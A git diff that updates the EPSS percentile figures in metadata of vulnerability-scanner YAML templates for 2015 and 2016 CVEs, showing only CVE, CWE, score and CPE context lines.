100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2015-2068 cwe-id: CWE-79 epss-score: 0.00146 - epss-percentile: 0.50299 + epss-percentile: 0.50325 cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml index 0f2878e645..04948f0d60 100644 --- a/http/cves/2015/CVE-2015-2080.yaml +++ b/http/cves/2015/CVE-2015-2080.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-2080 cwe-id: CWE-200 epss-score: 0.95465 - epss-percentile: 0.99164 + epss-percentile: 0.99165 cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index 544f5469c8..851f36c06c 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-2166 cwe-id: CWE-22 epss-score: 0.23272 - epss-percentile: 0.96014 + epss-percentile: 0.96017 cpe: cpe:2.3:a:ericsson:drutt_mobile_service_delivery_platform:4.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index 8a99b050d5..eef910125a 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-2196 cwe-id: CWE-89 epss-score: 0.0093 - epss-percentile: 0.81269 + epss-percentile: 0.81281 cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index a756cfd795..18775d4923 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-2755 cwe-id: CWE-352 epss-score: 0.02569 - epss-percentile: 0.89073 + epss-percentile: 0.8908 cpe: cpe:2.3:a:ab_google_map_travel_project:ab_google_map_travel:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index f8a4618952..ce3f25fcf3 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-2807 cwe-id: CWE-79 epss-score: 0.00665 - epss-percentile: 0.77433 + epss-percentile: 0.77454 cpe: cpe:2.3:a:documentcloud:navis_documentcloud:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index c5a2e5048b..d6f8bee017 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-2863 cwe-id: CWE-601 epss-score: 0.00626 - epss-percentile: 0.76661 + epss-percentile: 0.7668 cpe: cpe:2.3:a:kaseya:virtual_system_administrator:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index dfa0ac8e3d..2ad563e3f6 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-2996 cwe-id: CWE-22 epss-score: 0.77754 - epss-percentile: 0.97881 + epss-percentile: 0.97884 cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index 3c6ae0d037..39c2002c71 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-3035 cwe-id: CWE-22 epss-score: 0.58993 - epss-percentile: 0.97377 + epss-percentile: 0.97378 cpe: cpe:2.3:o:tp-link:tl-wr841n_\(9.0\)_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index 05bf2ea51d..ff4a4c4a6d 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-3224 cwe-id: CWE-284 epss-score: 0.93857 - epss-percentile: 0.98872 + epss-percentile: 0.98873 cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index 6f14de701e..e9f842d735 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-3337 cwe-id: CWE-22 epss-score: 0.96596 - epss-percentile: 0.9949 + epss-percentile: 0.99491 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml index a424cdab7c..35e3268216 100644 --- a/http/cves/2015/CVE-2015-3648.yaml +++ b/http/cves/2015/CVE-2015-3648.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-3648 cwe-id: CWE-22 epss-score: 0.02644 - epss-percentile: 0.89215 + epss-percentile: 0.89222 cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index 0ec0e9af8c..0163aac5ec 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-3897 cwe-id: CWE-22 epss-score: 0.83225 - epss-percentile: 0.9808 + epss-percentile: 0.98081 cpe: cpe:2.3:a:bonitasoft:bonita_bpm_portal:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index 640c5ca4ec..2345019794 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4050 cwe-id: CWE-284 epss-score: 0.00847 - epss-percentile: 0.80292 + epss-percentile: 0.80306 cpe: cpe:2.3:a:sensiolabs:symfony:2.3.19:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index 3a3169c04a..3ed07858e4 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-4062 cwe-id: CWE-89 epss-score: 0.02803 - epss-percentile: 0.89507 + epss-percentile: 0.89514 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index e248a26b4a..13d9a97666 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4063 cwe-id: CWE-79 epss-score: 0.04016 - epss-percentile: 0.91061 + epss-percentile: 0.91066 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index a72a25277d..08cae970a7 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-4074 cwe-id: CWE-22 epss-score: 0.00598 - epss-percentile: 0.7605 + epss-percentile: 0.76073 cpe: cpe:2.3:a:helpdesk_pro_project:helpdesk_pro:*:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index 4b2fd1d091..bdc53bf160 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4127 cwe-id: CWE-79 epss-score: 0.0034 - epss-percentile: 0.68268 + epss-percentile: 0.68294 cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml index 66b677359f..02e98f7582 100644 --- a/http/cves/2015/CVE-2015-4414.yaml +++ b/http/cves/2015/CVE-2015-4414.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4414 cwe-id: CWE-22 epss-score: 0.11221 - epss-percentile: 0.94564 + epss-percentile: 0.94567 cpe: cpe:2.3:a:se_html5_album_audio_player_project:se_html5_album_audio_player:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index 229ea5ca2c..24d43e2a0b 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4632 cwe-id: CWE-22 epss-score: 0.0282 - epss-percentile: 0.89535 + epss-percentile: 0.89542 cpe: cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index e902a2a8a7..9fe738b991 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4666 cwe-id: CWE-22 epss-score: 0.02372 - epss-percentile: 0.88653 + epss-percentile: 0.88658 cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index 782abd901d..b73ab1ebca 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-4668 cwe-id: CWE-601 epss-score: 0.00397 - epss-percentile: 0.70621 + epss-percentile: 0.70645 cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index 4a4a19b610..e68d31fdfc 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4694 cwe-id: CWE-22 epss-score: 0.02304 - epss-percentile: 0.88495 + epss-percentile: 0.88499 cpe: cpe:2.3:a:zip_attachments_project:zip_attachments:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml index 6c1a856236..a0bede8356 100644 --- a/http/cves/2015/CVE-2015-5354.yaml +++ b/http/cves/2015/CVE-2015-5354.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-5354 cwe-id: CWE-601 epss-score: 0.00166 - epss-percentile: 0.53112 + epss-percentile: 0.53141 cpe: cpe:2.3:a:novius-os:novius_os:5.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index 02e2b9d12b..0dbbb91c94 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-5461 cwe-id: NVD-CWE-Other epss-score: 0.0055 - epss-percentile: 0.74937 + epss-percentile: 0.74959 cpe: cpe:2.3:a:stageshow_project:stageshow:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index 4f2fb30583..36f5210161 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-5469 cwe-id: CWE-22 epss-score: 0.02176 - epss-percentile: 0.88153 + epss-percentile: 0.88158 cpe: cpe:2.3:a:mdc_youtube_downloader_project:mdc_youtube_downloader:2.1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index 70b56d8563..24e735a97a 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-5471 cwe-id: CWE-22 epss-score: 0.11139 - epss-percentile: 0.94541 + epss-percentile: 0.94544 cpe: cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index 02cc6d3016..9c836b927e 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-5531 cwe-id: CWE-22 epss-score: 0.97144 - epss-percentile: 0.99723 + epss-percentile: 0.99724 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index a8495d065f..b03cb87caf 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-5688 cwe-id: CWE-22 epss-score: 0.01347 - epss-percentile: 0.84666 + epss-percentile: 0.84673 cpe: cpe:2.3:a:geddyjs:geddy:13.0.7:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml index bdf8ad6af2..80c69296c4 100644 --- a/http/cves/2015/CVE-2015-6477.yaml +++ b/http/cves/2015/CVE-2015-6477.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-6477 cwe-id: CWE-79 epss-score: 0.00294 - epss-percentile: 0.65826 + epss-percentile: 0.65862 cpe: cpe:2.3:o:nordex:nordex_control_2_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml index 25664658a5..f00a6722fd 100644 --- a/http/cves/2015/CVE-2015-6544.yaml +++ b/http/cves/2015/CVE-2015-6544.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-6544 cwe-id: CWE-79 epss-score: 0.00284 - epss-percentile: 0.65175 + epss-percentile: 0.65211 cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index d42f26f941..81bec92887 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2015-6920 cwe-id: CWE-79 epss-score: 0.0016 - epss-percentile: 0.52526 + epss-percentile: 0.52552 cpe: cpe:2.3:a:sourceafrica_project:sourceafrica:0.1.3:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index 80bfbdaedb..68ef275978 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-7245 cwe-id: CWE-22 epss-score: 0.96881 - epss-percentile: 0.99603 + epss-percentile: 0.99605 cpe: cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index 675b3198df..32563de3f5 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-7377 cwe-id: CWE-79 epss-score: 0.00239 - epss-percentile: 0.61758 + epss-percentile: 0.61785 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index 03b12ce336..00171b5894 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-7450 cwe-id: CWE-94 epss-score: 0.9739 - epss-percentile: 0.9989 + epss-percentile: 0.99891 cpe: cpe:2.3:a:ibm:tivoli_common_reporting:2.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index a9b9b06bed..7f4c2b47be 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-7780 cwe-id: CWE-22 epss-score: 0.00151 - epss-percentile: 0.51163 + epss-percentile: 0.5119 cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index 74828c8c85..d2c7ceb10e 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2015-7823 cwe-id: NVD-CWE-Other epss-score: 0.00233 - epss-percentile: 0.61218 + epss-percentile: 0.61246 cpe: cpe:2.3:a:kentico:kentico_cms:8.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml index a6d2a6a6ce..4534ef4eb5 100644 --- a/http/cves/2015/CVE-2015-8349.yaml +++ b/http/cves/2015/CVE-2015-8349.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2015-8349 cwe-id: CWE-79 epss-score: 0.0013 - epss-percentile: 0.4761 + epss-percentile: 0.4762 cpe: cpe:2.3:a:gameconnect:sourcebans:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index 44a11f1409..98aa1a5dd2 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-8813 cwe-id: CWE-918 epss-score: 0.00511 - epss-percentile: 0.73977 + epss-percentile: 0.74003 cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index 308ee25672..ef815670c1 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-9312 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-9323.yaml b/http/cves/2015/CVE-2015-9323.yaml index 977f33b948..c1da0b7360 100644 --- a/http/cves/2015/CVE-2015-9323.yaml +++ b/http/cves/2015/CVE-2015-9323.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2015-9323 cwe-id: CWE-89 epss-score: 0.00779 - epss-percentile: 0.79412 + epss-percentile: 0.79421 cpe: cpe:2.3:a:duckdev:404_to_301:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-9414.yaml b/http/cves/2015/CVE-2015-9414.yaml index 176d5fac9b..2026eee0f6 100644 --- a/http/cves/2015/CVE-2015-9414.yaml +++ b/http/cves/2015/CVE-2015-9414.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-9414 cwe-id: CWE-79 epss-score: 0.00111 - epss-percentile: 0.44141 + epss-percentile: 0.44164 cpe: cpe:2.3:a:wpsymposiumpro:wp-symposium:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-9480.yaml b/http/cves/2015/CVE-2015-9480.yaml index cd5cde9b7e..5a68a2ec7a 100644 --- a/http/cves/2015/CVE-2015-9480.yaml +++ b/http/cves/2015/CVE-2015-9480.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2015-9480 cwe-id: CWE-22 epss-score: 0.29071 - epss-percentile: 0.96352 + epss-percentile: 0.96355 cpe: cpe:2.3:a:robot-cpa:robotcpa:5:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml index ff5fb632c6..b346503be3 100644 --- a/http/cves/2016/CVE-2016-0957.yaml +++ b/http/cves/2016/CVE-2016-0957.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2016-0957 epss-score: 0.06304 - epss-percentile: 0.92832 + epss-percentile: 0.92837 cpe: cpe:2.3:a:adobe:dispatcher:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index 59fdaf12e6..3714e2b70b 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000126 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45718 + epss-percentile: 0.45731 cpe: cpe:2.3:a:admin-font-editor_project:admin-font-editor:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index 2af75d241a..a78e72d77c 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000127 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45718 + epss-percentile: 0.45731 cpe: cpe:2.3:a:ajax-random-post_project:ajax-random-post:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000128.yaml b/http/cves/2016/CVE-2016-1000128.yaml index 57a898e2cb..bee776064d 100644 --- a/http/cves/2016/CVE-2016-1000128.yaml +++ b/http/cves/2016/CVE-2016-1000128.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000128 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49813 + epss-percentile: 0.49832 cpe: cpe:2.3:a:anti-plagiarism_project:anti-plagiarism:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml index 3cc41eadd6..f9277d58b7 100644 --- a/http/cves/2016/CVE-2016-1000129.yaml +++ b/http/cves/2016/CVE-2016-1000129.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000129 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45718 + epss-percentile: 0.45731 cpe: cpe:2.3:a:defa-online-image-protector_project:defa-online-image-protector:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml index 88f15826d5..c062ee382c 100644 --- a/http/cves/2016/CVE-2016-1000130.yaml +++ b/http/cves/2016/CVE-2016-1000130.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000130 cwe-id: CWE-79 epss-score: 0.00093 - epss-percentile: 0.39116 + epss-percentile: 0.39132 cpe: cpe:2.3:a:e-search_project:e-search:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index 347d75b3b7..6c198a6715 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000131 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49813 + epss-percentile: 0.49832 cpe: cpe:2.3:a:e-search_project:esearch:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml index fe986a3ef9..b131183d96 100644 --- a/http/cves/2016/CVE-2016-1000132.yaml +++ b/http/cves/2016/CVE-2016-1000132.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000132 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.45117 + epss-percentile: 0.45133 cpe: cpe:2.3:a:cminds:tooltip_glossary:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index c418324b0e..d059101c60 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000133 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49666 + epss-percentile: 0.49683 cpe: cpe:2.3:a:designsandcode:forget_about_shortcode_buttons:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml index 775bfa6fe9..8412b698b7 100644 --- a/http/cves/2016/CVE-2016-1000134.yaml +++ b/http/cves/2016/CVE-2016-1000134.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000134 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49813 + epss-percentile: 0.49832 cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml index b17d77f33a..dbe9ed03f0 100644 --- a/http/cves/2016/CVE-2016-1000135.yaml +++ b/http/cves/2016/CVE-2016-1000135.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000135 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49813 + epss-percentile: 0.49832 cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000136.yaml b/http/cves/2016/CVE-2016-1000136.yaml index 44986c6144..969d06af49 100644 --- a/http/cves/2016/CVE-2016-1000136.yaml +++ b/http/cves/2016/CVE-2016-1000136.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000136 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45718 + epss-percentile: 0.45731 cpe: cpe:2.3:a:heat-trackr_project:heat-trackr:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index 83f798014f..4937db8a6d 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000137 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49813 + epss-percentile: 0.49832 cpe: cpe:2.3:a:hero-maps-pro_project:hero-maps-pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index 0ff76dfc9c..12f021644a 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-1000138 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45718 + epss-percentile: 0.45731 cpe: cpe:2.3:a:indexisto_project:indexisto:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000139.yaml b/http/cves/2016/CVE-2016-1000139.yaml index 